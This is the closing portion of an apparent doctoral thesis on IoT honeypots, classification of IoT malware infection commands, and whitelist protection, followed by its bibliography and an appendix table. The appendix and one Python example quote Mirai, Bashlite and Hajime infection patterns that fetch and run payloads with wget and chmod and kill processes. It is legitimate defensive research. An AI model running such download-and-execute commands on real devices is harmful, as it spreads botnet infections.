As described in Section 6.2.3, a developer must satisfy four major conditions in order to deploy

IoTProtect. These conditions can act as constraints for device developers. In addition, if

existing devices do not satisfy them, additional effort might be required to modify the

firmware, thereby limiting the advantage of easy deployment. We can at least say that these

conditions are satisfied by the four existing devices we tested.


Chapter 7.

Conclusion and future works

7.1. Conclusion

In recent years, cyber threats against IoT have become a reality. Mirai botnets executed a

massive distributed denial of service (DDoS) attack against Dyn DNS in 2016. A report from

Kaspersky in Sept. 2018 shows that Mirai is still the most popular IoT malware family among

cybercriminals (20.9%). Moreover, IoT malware keeps evolving and exploits multiple

vulnerabilities to infect IoT devices. Since May 2018, the Mirai and Bashlite malware families

have assimilated many known exploits affecting Internet of Things (IoT) devices. These exploits

target devices from 11 makers over the HTTP, UPnP, Telnet, and SOAP protocols. Hence, the

tools for observing cyber attacks in IoT should be reconsidered and re-evaluated. To observe

these complicated attack vectors, we used physical IoT devices to build the honeypot. However,

physical IoT devices bring management challenges and information leak problems.

In Chapter 3, we introduced frequent cyber attacks against IoT and then described an

observation and analysis framework and a countermeasure for cyber attacks in IoT. The first part is

a set of techniques to support a honeypot consisting of physical IoT devices. The MITM proxy can control

the incoming and outbound traffic of the honeypot, filter out unwanted attack flows, and prevent

information leaks. The second is a set of techniques for analyzing the massive data of the IoT honeypot. We applied

text mining and machine learning algorithms to find new attack vectors and categorize known botnets'

attacks. The third is a whitelisting-based countermeasure against cyber attacks in IoT. Moreover,

we showed how to protect the IoT devices in the honeypot from unwanted cyber attacks. We also

presented how to create an appropriate view that analyzes the incoming data in depth and

utilizes our resources efficiently. Finally, we showed a method to recognize IoT malware processes

by examining the pathnames and binary hash values exposed in the "/proc" folder.

In Chapter 4, we combined the capabilities of a transparent proxy and a web tracking library to develop

a supporting mechanism for a honeypot consisting of physical IoT devices. ThingGate can improve

the security of the honeypot, extend the functionality of web tracking, manage the incoming traffic,

and output response content in a MITM manner. We evaluated ThingGate on the public Internet and demonstrated

its effectiveness. In our observation, ThingGate did not yield to cyber attacks

against the physical devices, such as RCE attacks and long-term peeping. In our experimental results,

we successfully tracked an attacker in the USA who used multiple IP addresses to visit our honeypot. To handle

unwanted incoming flows, we showed that ThingGate can block traffic that changes critical

configuration. Moreover, ThingGate collected 149 malware binaries and 23 scripts from 411

misplaced CI-URLs, which employed seven vulnerabilities. Furthermore, ThingGate fooled seven

clients who requested the Wi-Fi AP list in the WebUI with fabricated APs.
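
The idea of blocking requests that would change critical configuration can be sketched as a simple path-based filter. This is only an illustrative sketch and not ThingGate's actual rule set: the endpoint prefixes below are hypothetical placeholders, and a real deployment would derive them from the WebUI of the specific device behind the proxy.

```python
from urllib.parse import urlsplit

# Hypothetical WebUI endpoints that would alter critical device configuration.
# These names are placeholders for illustration, not taken from any real device.
BLOCKED_PATH_PREFIXES = (
    "/admin/set_password",
    "/admin/network",
    "/admin/firmware",
)


def should_block(url: str) -> bool:
    """Return True if the request URL targets a protected configuration endpoint.

    The check is on the path only, because many embedded WebUIs accept
    configuration changes through GET as well as POST requests.
    """
    path = urlsplit(url).path.lower()
    return any(path.startswith(prefix) for prefix in BLOCKED_PATH_PREFIXES)


if __name__ == "__main__":
    for candidate in (
        "http://192.0.2.10/index.html",
        "http://192.0.2.10/admin/set_password?new=1234",
    ):
        print(candidate, "->", "block" if should_block(candidate) else "forward")
```

A proxy placed in front of the physical device could call such a predicate for every incoming request and forward only those that are not blocked, so the device keeps its original configuration while the attack attempt is still logged.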

In Chapter 5, we analyzed a 22.9 GB Telnet log and 5,616 different malware binaries collected by

the IoT honeypot. We filtered 2.7 million infection logs, mapped them to 44,834 ECTs, and conducted

classification and clustering analysis on the ECTs. The confusion tables and the accuracy of our

classification method led to several definite conclusions. First, the lowest accuracy of all the ECTs

was 0.9675, indicating that even for a dataset spanning nine months, our method remained valid.

Although command sequences can change many times, the use of trigram features can accurately

distinguish Mirai, Bashlite, and Hajime malware, based on differences in their infection command

patterns. These malware categories have distinctive command patterns, and the hidden feature

can be extracted for further analysis. Second, we demonstrated that using clustering with a trigram

sequence can detect variant attack patterns (for example, wget DoS attack) and facilitate

identification of similarities between different malware families, without requiring the collection

of malware binaries.
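
To make the notion of trigram features concrete, the following Python sketch extracts trigrams from an infection command sequence and compares two sequences by the overlap of their trigram sets. It is a simplified illustration under stated assumptions: whitespace tokenization and Jaccard similarity are choices made here for brevity, and they are not claimed to match the feature extraction or the classifiers used in Chapter 5.

```python
from collections import Counter


def trigram_counts(sequence: str) -> Counter:
    """Count token-level trigrams in a command sequence (whitespace tokenization)."""
    tokens = sequence.split()
    return Counter(zip(tokens, tokens[1:], tokens[2:]))


def jaccard_similarity(seq_a: str, seq_b: str) -> float:
    """Jaccard similarity of the trigram sets of two command sequences."""
    grams_a = set(trigram_counts(seq_a))
    grams_b = set(trigram_counts(seq_b))
    union = grams_a | grams_b
    if not union:
        return 0.0  # neither sequence is long enough to form a trigram
    return len(grams_a & grams_b) / len(union)


if __name__ == "__main__":
    first = "cd /tmp ; wget [url] ; chmod 777 bot ; sh bot"
    second = "cd /var ; wget [url] ; chmod 777 bot ; sh bot"
    print(round(jaccard_similarity(first, second), 3))
```

Sequences that differ only in a directory name or URL still share most of their trigrams, which is one intuition for why such features can group variants of the same family even when individual commands change.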


In chapter 6, we have shown that IoTProtect is a valid solution that can remove IoT malware

processes with reasonable implementation and resource costs. Moreover, we implemented a shell

script prototype and showed that it could be executed successfully on low-cost IoT devices, such

as Wi-Fi routers and storage, with marginal cost. We tested more than four thousand different IoT

malware binaries, and IoTProtect removed 99.92% of these malicious processes successfully.

7.2. Future works

Cyber attacks in IoT keep evolving and serve diverse purposes. In this study, we used honeypots

to observe existing attacks, analyzed the threats, and reflected the findings in a whitelist-based

protection method. We think that extending the observation scope to more protocols and deeper into

local area networks (LANs) is essential. The knowledge obtained from honeypots and analysis

can also be utilized to protect devices proactively, for example through an IDS or early-warning system

that detects newly evolving attacks. Thus, future work should focus on how to implement advanced

honeypots and network-based countermeasures against cyber attacks in IoT.


Bibliography

[1] L. J., Rivera, and L., Goasduff, "Gartner says a thirty-fold increase in internet-connected

physical devices by 2020 will significantly alter how the supply chain operates," Gartner,

https://www.gartner.com/newsroom/id/2688717, accessed Jan. 18. 2019.

[2] P., Loshin, “Details emerging on Dyn DNS DDoS attack, Mirai IoT botnet,” TechTarget

network, http://searchsecurity.techtarget.com/news/450401962/Details-emerging-on-Dyn-DNS-DDoS-attack-Mirai-IoT-botnet,

accessed Feb. 06. 2019.

[3] R, Nigam, “Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns,” Unit42,

https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-

campaigns/, accessed Feb. 06. 2019.

[4] Y.M.P., Pa, S., Suzuki, K., Yoshioka, T., Matsumoto, T. Kasama, and C., Rossow, “IoTPOT:

A Novel Honeypot for Revealing Current IoT Threats,” Journal of Information Processing,

Vol.24, No.3, pp.522–533, 2016.

[5] J. D., Guarnizo, A., Tambe, S. S., Bhunia, M., Ochoa, N. O., Tippenhauer, A., Shabtai, & Y.,

Elovici, “Siphon: Towards scalable high-interaction physical honeypots,” In Proceedings of

the 3rd ACM Workshop on Cyber-Physical System Security, pp. 57-68, April, 2017.

[6] T., Luo, Z., Xu, X., Jin, Y., Jia, & X., Ouyang, "Iotcandyjar: Towards an intelligent-

interaction honeypot for iot devices." Black Hat, 2017.

[7] Y., Ezawa, K., Tamiya, S., Nakayama, Y., Tie, K., Yoshioka, and T., Matsumoto, “An

Analysis of Attacks Targeting WebUI of Embedded Devices by Bare-metal Honeypot,” In

Computer Security Symposium 2017, Oct., 2017.

[8] M., Kuzin, Y., Shmelev, and V., Kuskov, "New trends in the world of IoT threats," AO

Kaspersky Lab, https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/,

accessed Feb. 6. 2019.


[9] Carnegie Mellon University. "The ‘Only’ Coke Machine on the Internet,"

https://www.cs.cmu.edu/~coke/history_long.txt, accessed Feb. 6. 2019.

[10]R.S., Raji, "Smart networks for control." IEEE spectrum 31, no. 6 (1994): 49-55.

[11]K., Ashton, "That ‘internet of things’ thing." RFID Journal 22, no. 7 (2009): 97-114.

[12]H., Eero, J., Grönvall, and K., Främling. "Tracking and tracing parcels using a distributed

computing approach." Proceedings of the 14th Annual conference for Nordic researchers in

logistics (NOFOMA'2002), Trondheim, Norway. 2002.

[13]E., Dave. "The internet of things: How the next evolution of the internet is changing

everything." CISCO white paper 1, no. 2011

[14]R., Puri, "Bots & Botnet: An Overview," SANS Institute,

https://www.sans.org/reading-room/whitepapers/malicious/bots-botnet-overview-1299, accessed June. 20. 2019.

[15]A. Tellez, “Bashlite,” GitHub, https://github.com/anthonygtellez/BASHLITE, accessed

Jan. 18. 2019.

[16]M., Antonakakis, T., April, M., Bailey, M., Bernhard, E., Bursztein, J., Cochran, Z., Durumeric et

al. "Understanding the mirai botnet." In 26th USENIX Security Symposium (USENIX

Security 17), pp. 1093-1110. 2017.

[17]K., Tamiya, Y., Ezawa, Y., Tie, S., Nakayama, K., Yoshioka, and T., Matsumoto,

"Observation of Peeping using Decoy IP Camera," In Symposium on Cryptography and

Information Security 2018, Jan., 2018.

[18]T. F. Yen, V. Heorhiadi, A. Oprea, M. K. Reiter, and A. Juels, “An epidemiological study of

malware encounters in a large enterprise,” In Proceedings of the 2014 ACM SIGSAC

Conference on Computer and Communications Security, ACM, pp. 1117-1130, 2014.

[19]M. M. Masud, L. Khan and B. Thuraisingham, “A scalable multi-level feature extraction

technique to detect malicious executables,” Information Systems Frontiers, vol. 10, no. 1,


pp. 33-45, 2008.

[20]M. Ahmadi, D. Ulyanov, S. Semenov, M. Trofimov, and G. Giacinto, “Novel feature

extraction, selection and fusion for effective malware category classification,” In

Proceedings of the Sixth ACM Conference on Data and Application Security and Privacy,

ACM, pp. 183-194, 2016.

[21]J. Drew, T. Moore, and M. Hahsler, “Polymorphic Malware Detection Using Sequence

Classification Methods”, In Proceedings of 2016 IEEE Security and Privacy Workshops

(SPW), 2016.

[22]F. Shahzad and M. Farooq, “ELF-Miner: using structural knowledge and data mining

methods to detect new (Linux) malicious executables,” Knowledge and information

systems, vol. 30, no. 3, pp. 589-612, 2012.

[23]J. Bai, Y. Yang, S. Mu, and Y. Ma, “Malware detection through mining symbol table of

Linux executables,” Information Technology Journal, vol. 12, no. 2, pp. 380-384, 2013.

[24]X. Wang, W. Yu, A. Champion, X. Fu, and D. Xuan, “Detecting worms via mining dynamic

program execution,” In Proceedings of 2007 Third International Conference on Security and

Privacy in Communications Networks and the Workshops - SecureComm 2007, pp. 412-

421, 2007.

[25]Ham, Hyo-Sik, et al. “Linear SVM-based android malware detection for reliable IoT

services.” Journal of Applied Mathematics, vol. 2014, 2014.

[26]Azmoodeh, Amin, Ali Dehghantanha, and Kim-Kwang Raymond Choo. "Robust Malware

Detection for Internet Of (Battlefield) Things Devices Using Deep Eigenspace Learning."

IEEE Transactions on Sustainable Computing, 2018.

[27]J. Su, D. V. Vargas, S. Prasad, D. Sgandurra, Y. Feng, and K. Sakurai, “Lightweight

Classification of IoT Malware based on Image Recognition,” In Proceedings of 2018 IEEE


42nd Annual Computer Software and Applications Conference (COMPSAC), Tokyo, Japan,

2018.

[28]H., Pareek, S., Romana, and P. R. L. Eswari,(2012). “Application whitelisting: approaches

and challenges.” International Journal of Computer Science, Engineering and Information

Technology (IJCSEIT), 2(5).

[29]S., Obermeier, R., Schierholz, and A., Hristova,(2014, September). “Securing industrial

automation and control systems using application whitelisting.” In Emerging Technology

and Factory Automation (ETFA), 2014 IEEE (pp. 1-4). IEEE.

[30]R., Bhardwaj, M., Daftari, D., John, N., Shinde, and V.Deshpande, (2015). “Whitelisting

and Blacklisting for Private Execution of Processes” in Linux

[31]“Debsums - check the MD5 sums of installed Debian packages.”

http://manpages.ubuntu.com/manpages/zesty/en/man1/debsums.1.html, accessed June 21,

2019.

[32]R., Paleari, L., Martignoni, E., Passerini, D., Davidson, M., Fredrikson, J. T., Giffin, and S.,

Jha, (2010, August). “Automatic Generation of Remediation Procedures for Malware

Infections.” In USENIX Security Symposium, pp. 419-434.

[33]F., Shahzad, S., Bhatti, M., Shahzad, and M., Farooq, (2011, June). “In-execution malware

detection using task structures of linux processes.” In Communications (ICC), 2011 IEEE

International Conference on (pp. 1-6). IEEE.

[34]K., Tamiya, S., Nakayama, Y., Ezawa, Y., Tie, C., Wu, D., Yang, K., Yoshioka, and T.

Matsumoto, (2017). “Experiment on removal and prevention of IoT malware using real

devices.” In Symposium on Cryptography and Information Security 2017, Session 3E1-5,

Naha, Japan, 2017.

[35]M., Koike, N., Ogura, S., Takumi, Y., Hanatani, and H. Haruki, (2017). “Development of


WhiteEgret™: A Whitelisting-type Execution Control on Linux.” In Computer Security

Symposium 2017, Session 3D3-4, Yamagata, Japan, 2017.

[36]E., Cozzi, M., Graziano, Y., Fratantonio, and D., Balzarotti. "Understanding linux malware."

In 2018 IEEE Symposium on Security and Privacy (SP), pp. 161-175. IEEE, 2018.

[37]D., Goodin, "BrickerBot, the permanent denial-of-service botnet, is back with a vengeance,"

ARS TECHNICA, https://arstechnica.com/information-technology/2017/04/brickerbot-the-

permanent-denial-of-service-botnet-is-back-with-a-vengeance/, accessed Feb. 06. 2019.

[38]Fidus, "DLINK DCS-5020L DAY N’ NIGHT CAMERA REMOTE CODE EXECUTION

WALKTHROUGH," Fidus, https://fidusinfosec.com/dlink-dcs-5030l-remote-code-

execution-cve-2017-17020/, accessed Feb. 06. 2019.

[39]M., Jakobsson, and Z., Ramzan, "Crimeware: understanding new attacks and defenses,"

pp17-19, Addison-Wesley Professional, 2008.

[40]A., Luotonen, and k., Altis, "World-wide web proxies," Computer Networks and ISDN

systems, 27(2), pp147-154, 1994.

[41]PF (4), https://www.freebsd.org/cgi/man.cgi?pf, accessed Feb. 06. 2019.

[42]Rieger, G., socat (1) - Linux man page, https://linux.die.net/man/1/socat, accessed Feb. 06.

2019.

[43]P. Eckersley, "How unique is your web browser?" In International Symposium on Privacy

Enhancing Technologies Symposium, pp. 1-18. Springer, Berlin, Heidelberg, July, 2010.

[44]K., Mowery, and H., Shacham, “Pixel perfect: Fingerprinting canvas in HTML5.” In

Proceedings of W2SP, pp1-12, 2012

[45]G., Acar, C., Eubank, S., Englehardt, M., Juarez, A., Narayanan, and C., Diaz, "The web

never forgets: Persistent tracking mechanisms in the wild," In Proceedings of the 2014 ACM

SIGSAC Conference on Computer and Communications Security, pp. 674-689, Nov, 2014.


[46]P., Raschke, and A., Küpper, A. "Uncovering Canvas Fingerprinting in Real-Time and

Analyzing ist Usage for Web-Tracking," In Workshops der INFORMATIK 2018-

Architekturen, Prozesse, Sicherheit und Nachhaltigkeit. Köllen Druck+ Verlag GmbH, 2018.

[47]"Valve/fingerprintjs2", https://github.com/Valve/fingerprintjs2, accessed Feb. 06. 2019.

[48]Fidus, "DLINK DCS-5020L DAY N’ NIGHT CAMERA REMOTE CODE EXECUTION

WALKTHROUGH," Fidus, https://fidusinfosec.com/dlink-dcs-5030l-remote-code-

execution-cve-2017-17020/, accessed Feb. 06. 2019.

[49]METASPLOIT, "D-Link DSL-2750B - OS Command Injection (Metasploit),"

https://www.exploit-db.com/exploits/44760, accessed Feb. 06. 2019.

[50]"Kernel and Device Drivers Layer,"

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Tech

nology_Overview/SystemTechnology/SystemTechnology.html, accessed Feb. 06. 2019.

[51]”mitmproxy”, https://mitmproxy.org/, accessed Feb. 06. 2019.

[52]S., Henning, A. Rao, and R., Lanphier, "Real time streaming protocol (RTSP),"

https://www.ietf.org/rfc/rfc2326.txt, accessed Feb. 06. 2019.

[53]P., Alan, L., Farrell, D., Kemp, and W. Lupton. "Upnp device architecture 1.1." In UPnP

Forum, vol. 22. 2008.

[54]Z., PENG and C., WU, "Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote

Buffer Overflow," Exploit Database, https://www.exploit-db.com/exploits/41738, accessed

Feb. 06. 2019.

[55]METASPLOIT, “D-Link DCS-930L - (Authenticated) Remote Command Execution

(Metasploit),” https://www.exploit-db.com/exploits/39437, accessed Feb. 06. 2019.

[56]Google, "," https://support.google.com/webmasters/answer/182072?hl=en, accessed Feb.

06. 2019.


[57]Google, "Verifying Googlebot," https://support.google.com/webmasters/answer/80553,

accessed Feb. 06. 2019

[58]VULNSPY, "ThinkPHP 5.0.23/5.1.31 - Remote Code Execution," https://www.exploit-

db.com/exploits/45978, accessed Feb. 06. 2019.

[59]G., Eberhardt, "AVTECH IP Camera / NVR / DVR Devices - Multiple Vulnerabilities,"

https://www.exploit-db.com/exploits/40500, accessed Feb. 06. 2019.

[60]CORE SECURITY, "AirLink101 SkyIPCam1620W - OS Command Injection,"

https://www.exploit-db.com/exploits/37527, accessed Feb. 06. 2019.

[61]Procode701, "Fastweb FASTGate - 0.00.67 RCE Vulnerability,"

https://cxsecurity.com/issue/WLB-2018100117, accessed Feb. 06. 2019.

[62]"CVE-2018-14847," https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14847,

accessed Feb. 06. 2019.

[63]HOUSSAMIX, "TUTOS 1.3 - 'cmd.php' Remote Command Execution,"

https://www.exploit-db.com/exploits/4861, accessed Feb. 06. 2019.

[64]V. Total, "Analyze suspicious files and URLs to detect types of malware, automatically

share them with the security community," https://www.virustotal.com/#/home/upload,

accessed Feb. 06. 2019.

[65]B. Krebs, “Source Code for IoT Botnet ‘Mirai’ Released,”

https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-Mirai-released/, accessed

Jan. 18. 2019.

[66]J. Gamblin, “Mirai-Source-Code,” GitHub, https://github.com/jgamblin/Mirai-Source-

Code/, accessed Jan. 18. 2019.

[67]W. H. Gomaa and A. A. Fahmy, “A survey of text similarity approaches," International

Journal of Computer Applications, vol. 68, no. 13, pp. 13-18, 2013.


[68]M., Christopher, P., Raghavan, and H., Schütze. "Introduction to information retrieval."

Natural Language Engineering 16.1 (2010), pp. 100-103.

[69]Ukkonen, Esko. "Approximate string-matching with q-grams and maximal matches."

Theoretical computer science 92 no.1 (1992), pp. 191-211

[70]M., Sharma, N., Rajpal, R. B., Reddy, and K. R., Purwar, (2013). Normalised LCS-based

method for indexing multidimensional data cube. International Journal of Intelligent

Information and Database Systems, 7(2), pp. 180-204.

[71]Bakkelund, Daniel. "An LCS-based string metric." Oslo, Norway: University of Oslo

(2009).

[72]Heeringa, Wilbert Jan. "Measuring dialect pronunciation differences using Levenshtein

distance." PhD diss., University Library Groningen, pp. 130-132. 2004.

[73]Dreßler, Kevin, and Axel-Cyrille Ngonga Ngomo. "On the efficient execution of bounded

jaro-winkler distances." Semantic Web 8.2 (2017), pp. 185-196.

[74]D. Davidson, “linux.mirai,” https://github.com/0x27/, accessed Jan. 18. 2019.

[75]G. Kondrak, “N-gram similarity and distance,” In International Symposium on String

Processing and Information Retrieval, Springer Berlin Heidelberg, pp.115-126, 2005.

[76]P. F. Brown, P. V. Desouza, R. L. Mercer, V. J. D. Pietra, and J. C. Lai, “Class-based n-gram

models of natural language,” Computational linguistics, vol. 18, no. 4, pp. 467-479, 1992.

[77]I. H. Witten, E. Frank, and M. A. Hall, “Data Mining: Practical machine learning tools and

techniques,” Morgan Kaufmann, 2016.

[78]M. Bailey et al. “Automated classification and analysis of internet malware”. In: Recent

Advances in Intrusion Detection. Ed. by C. Kruegel, L. Lippmann, and Clark Andrew. Vol.

4637. Lecture Notes in Computer Science, pp. 178–197, 2007.

[79]Joachims, Thorsten. "Text categorization with support vector machines: Learning with


many relevant features," In European conference on machine learning, pp. 137-142, 1998.

[80]Hotho, Andreas, Andreas Nürnberger, and Gerhard Paaß. "A brief survey of text mining." In

Ldv Forum, vol. 20, no. 1, pp. 19-62, 2005

[81]K. P. Murphy, “Naive bayes classifiers,” University of British Columbia, 2006.

[82]I. Rish, “An empirical study of the naive Bayes classifier,” In IJCAI 2001 workshop on

empirical methods in artificial intelligence, vol. 3, no. 22, pp. 41-46, 2001.

[83]K. Sato, “An inside look at google bigquery. White paper”, Google,

https://cloud.google.com/files/BigQueryTechnicalWP.pdf, accessed Jan. 18. 2019.

[84]F. Pedregosa et al., "Scikit-learn: Machine learning in Python", Journal of Machine

Learning Research, vol. 12, pp. 2825-2830, Oct. 2011.

[85]die.net, “ptmx(4) - Linux man page,” https://linux.die.net/man/4/ptmx., accessed Jan. 18.

2019.

[86]J. Trost, “7up (Mirai?) Triage, More IoT Malware Targeting Weak Passwords,”

http://www.covert.io/7up-mirai-triage-more-iot-malware-targeting-weak-passwords/,

accessed Jan. 18. 2019.

[87]C. Zheng, C. Xiao, and Y. Jia, “IoT Malware Evolves to Harvest Bots by Exploiting a Zero-

day Home Router Vulnerability,” Palo Alto Networks,

https://researchcenter.paloaltonetworks.com/2018/01/unit42-iot-malware-evolves-harvest-

bots-exploiting-zero-day-home-router-vulnerability/, accessed Jan. 18. 2019.

[88]E. Auchard, (2016, November 29). "Deutsche Telekom attack part of global campaign on

routers." https://www.reuters.com/article/us-deutsche-telekom-outages/deutsche-telekom-

attack-part-of-global-campaign-on-routers-idUSKBN13O0X4, accessed Nov. 26. 2017.

[89]L. Franceschi-Bicchierai, (2016, September 29). "How 1.5 Million Connected Cameras

Were Hijacked to Make an Unprecedented Botnet."


https://motherboard.vice.com/en_us/article/8q8dab/15-million-connected-cameras-ddos-

botnet-brian-krebs, accessed Nov. 26. 2017.

[90]McAfee, "Embedded Control." http://support.intelsecurity.com/us/products/embedded-

control.aspx, accessed Nov. 20. 2017.

[91]Kaspersky, "Embedded Systems Security 2.0."

https://support.kaspersky.com/kess2#requirements, accessed Nov. 19. 2017.

[92]"Supported embedded operating systems in OfficeScan 10.6."

https://success.trendmicro.com/solution/1060451-supported-embedded-operating-systems-

in-officescan-10-6, accessed Nov. 19. 2017.

[93]Symantec™, "Critical System Protection Version 5.2 RU9 MP6 Platform and Feature

Matrix."

https://symwisedownload.symantec.com//resources/sites/SYMWISE/content/live/DOCUME

NTATION/8000/DOC8022/en_US/SCSP_Platform_Feature_Matrix.pdf?__gda__=1511283

679_42c5dda9b7a1075c7b46cc29d7137977, accessed Nov. 20. 2017.

[94]"User Guide McAfee Embedded Control 6.5.1."

https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATI

ON/25000/PD25615/en_US/mec_651_ug_en_us.pdf, accessed Nov.20. 2017.

[95]Symantec, "Critical System Protection 5.2.9 Installation Guide." https://origin-

symwisedownload.symantec.com/resources/sites/SYMWISE/content/live/DOCUMENTATI

ON/5000/DOC5944/en_US/SCSP_Installation_Guide.pdf, accessed Nov. 20. 2017.

[96]"What is GNU/Linux?" http://www.getgnulinux.org/en/linux/, accessed June 21. 2017.

[97]"Yocto Project." https://www.yoctoproject.org/, accessed Nov. 27. 2017.

[98]Yocto Project, "Linux Kernel Development Manual."

http://www.yoctoproject.org/docs/2.0.2/kernel-dev/kernel-dev.html, accessed Nov. 27. 2017.


[99]M., Mitchell, J., Oldham, and A. Samuel,(2001). Advanced linux programming (pp. 147-

156). New Riders.

[100]"Proc - process information pseudo-filesystem." http://man7.org/linux/man-

pages/man5/proc.5.html, accessed June 21. 2017.

[101]E. Brown, (2016, October 27). "Open Source Operating Systems for IoT."

https://www.linux.com/news/open-source-operating-systems-iot, accessed July 30. 2017.

[102]B. Nguyen, (2003). "Linux Filesystem Hierarchy."

[103]"fstab - static information about the filesystems." http://man7.org/linux/man-

pages/man5/fstab.5.html, accessed June 21. 2017.

[104]R. Landley, (2005, October 17). "Ramfs, rootfs and initramfs."

https://www.kernel.org/doc/Documentation/filesystems/ramfs-rootfs-initramfs.txt, accessed

July 10. 2017.

[105]P., Lougher, and R., Lougher, (2008). "SquashFS."

[106]G., KH. (2009, August 5). "Driver Core: devtmpfs - kernel-maintained tmpfs-based /dev."

https://lwn.net/Articles/345480/, accessed July 10. 2017.

[107]P. Snyder, (1990, October). "tmpfs: A virtual memory filesystem." In Proceedings of the

autumn 1990 EUUG Conference, pp. 241-248.

[108]P., Mochel, (2005, July). "The sysfs filesystem." In Linux Symposium, p. 313.

[109]N. Brown, (2016, June 1). "Containers, pseudo TTYs, and backward compatibility."

https://lwn.net/Articles/688809/, accessed July 10. 2017.

[110]D. Woodhouse, (2001, July). "JFFS: The journalling flash filesystem." In Ottawa linux

symposium Vol. 2001.

[111]B., Hards, "The Linux USB sub-system." Sigma Bravo Pty Ltd,

http://www.linux-usb.org/USB-guide/book1.html, accessed June 21. 2017.


[112]"Vulnerability Details: CVE-2017-7253." http://www.cvedetails.com/cve/CVE-2017-

7253/, accessed July 30. 2017.

[113]C., Cimpanu, (2017, May 11). "40 Asus RT Router Models Are Vulnerable to Simple

Hacks." https://www.bleepingcomputer.com/news/security/40-asus-rt-router-models-are-

vulnerable-to-simple-hacks/, accessed July 30. 2017.

[114]T., Sudo (2016). 無線LAN機器、出荷停止 サイバー攻撃に悪用の恐れ [Shipment

of Wireless LAN equipment is suspended due to fear of abuse in cyber attacks],

http://www.asahi.com/articles/ASJDN5GJ5JDNUUPI00C.html, accessed July 30. 2017.

[115]"VirusTotal Public API v2.0." https://www.virustotal.com/en/documentation/public-api/,

accessed June 23. 2017

[116]F., Lardinois, (Sep. 7, 2012) "Google Acquires Online Virus, Malware and URL Scanner

VirusTotal. TechCrunch." https://techcrunch.com/2012/09/07/google-acquires-online-virus-

malware-and-url-scanner-virustotal/, accessed June 22. 2017.

[117]"IBM Watson IoT". https://github.com/ibm-watson-iot, accessed June 23. 2017.

[118]S., Nanz, and C. A., Furia, (2015, May). "A comparative study of programming languages

in Rosetta Code." In Software Engineering (ICSE), 2015 IEEE/ACM 37th IEEE

International Conference on Vol. 1, pp. 778-788. IEEE.

[119]J., Morris, S., Smalley, and G., Kroah-Hartman. (2002, August). "Linux security

modules: General security support for the linux kernel." In USENIX Security Symposium.


List of Papers

Reviewed papers in Journals

J-1) Chun-Jung Wu, Ying Tie, Satoshi Hara, Kazuki Tamiya, Akira Fujita, Katsunari

Yoshioka, and Tsutomu Matsumoto. "IoTProtect: Highly Deployable Whitelist-based

Protection for Low-cost Internet-of-Things Devices." Journal of Information Processing

Vol. 26, pp 662-672, Sept. 2018.

J-2) Chun-Jung Wu, Shin-Ying Huang, Katsunari Yoshioka, and Tsutomu Matsumoto. "IoT

Malware Analysis and New Pattern Discovery Through Sequence Analysis Using Meta-

Feature Information." The IEICE Transactions on Communications. Vol.E103-B,No.1,

Jan. 2020.

Papers in preparation for journal submission

J-3) Chun-Jung Wu, Katsunari Yoshioka, and Tsutomu Matsumoto. “ThingGate: A gateway

for managing traffic of bare-metal IoT honeypot.” Journal of Information Processing.

Technical Reports

T-1) Chun-Jung Wu, Ying Tie, Katsunari Yoshioka, and Tsutomu Matsumoto. "IoT malware

behavior analysis and classification using text mining algorithm." In Computer

Security Symposium (CSS), Akita, Japan, Oct. 2016.

T-2) Kazuki Tamiya, Sou Nakayama, Yuta Ezawa, Ying Tie, Chun-Jung Wu, Di Yang,

Katsunari Yoshioka, and Tsutomu Matsumoto. (2017). “Experiment on removal and

prevention of IoT malware using real devices.” In Symposium on Cryptography and

Information Security 2017, Session 3E1-5, Naha, Japan, 2017.


Appendix

Appendix A The text features and family of clusters

| Feature Id | ECT index / cluster size (*) | Cluster id | Text features | Family | Number of ECTs |
|---|---|---|---|---|---|
| 1 | (4) | 25 | rm -rf ; pkill -9 ;killall -9 ;, shell, cd /tmp \|\| cd /var/system \|\| cd /mnt \|\| cd /lib;rm -f /tmp/ \|\| /var/run/ \|\| /var/system/ \|\| /mnt/ \|\| /lib/* | Bashlite | 4 |
| 2 | 4224 | 26 | cd /tmp \|\| cd /var \|\| cd /dev/shm \|\| cd /var/tmp \|\| cd /root \|\| cd /, wget/tftp/get/ftpget, chmod, sh, rm | Bashlite | 1 |
| 3 | (10) | 21 | cd /tmp \|\| cd /var \|\| cd /dev/shm \|\| cd /var/tmp \|\| cd /root \|\| cd /, wget/tftp/get/ftpget, chmod, sh, rm | Bashlite (& Tsunami) | 10 |
| 4 | 3452 | 22 | >/dev/netslink/.t && cd /dev/netslink/ | Bashlite | 1 |
| 5 | 397 | 23 | cd /tmp; rm -fr *; wget/curl/tftp/get/ftpget, chmod, sh, rm | Bashlite | 1 |
| 6 | (37) | 20 | '>/tmp/.ptmx && cd /tmp/', '>/var/.ptmx && cd /var/', '>/dev/.ptmx && cd /dev/', '>/mnt/.ptmx && cd /mnt/', | Mirai variant | 37 |
| 7 | (9) | 19 | '>/tmp/.ptmx && cd /tmp/', '>/var/.ptmx && cd /var/', '>/dev/.ptmx && cd /dev/', '>/mnt/.ptmx && cd /mnt/', | Bashlite variant | 9 |
| 8 | 3665 | 24 | >/dev/.t && cd /dev/;>pppd, >/var/tmp/.t && cd /var/tmp/;>pppd, | Bashlite variant | 1 |
| 9 | (69) | 17 | /bin/busybox ECCHI, /bin/busybox ps; | Mirai | 69 |
| 10 | (3374) | 16 | /bin/busybox ECCHI, /bin/busybox ps; | Mirai | 3374 |
| 11 | 823 | 18 | /bin/busybox ECCHI, /bin/busybox ps; | Mirai | 1 |
| 12 | (4) | 15 | wget [url]l -O - > dvrHelper; chmod 777 ; /bin/busybox ECCHI | Mirai | 4 |
| 13 | (151) | 13 | (dd bs=52 count=1 if=.s \|\| cat .s), (dd bs=52 count=1 if=.s \|\| cat .s), | Hajime | 151 |
| 14 | 2236 | 14 | (dd bs=52 count=1 if=.s \|\| cat .s), (dd bs=52 count=1 if=.s \|\| cat .s), | Hajime | 1 |
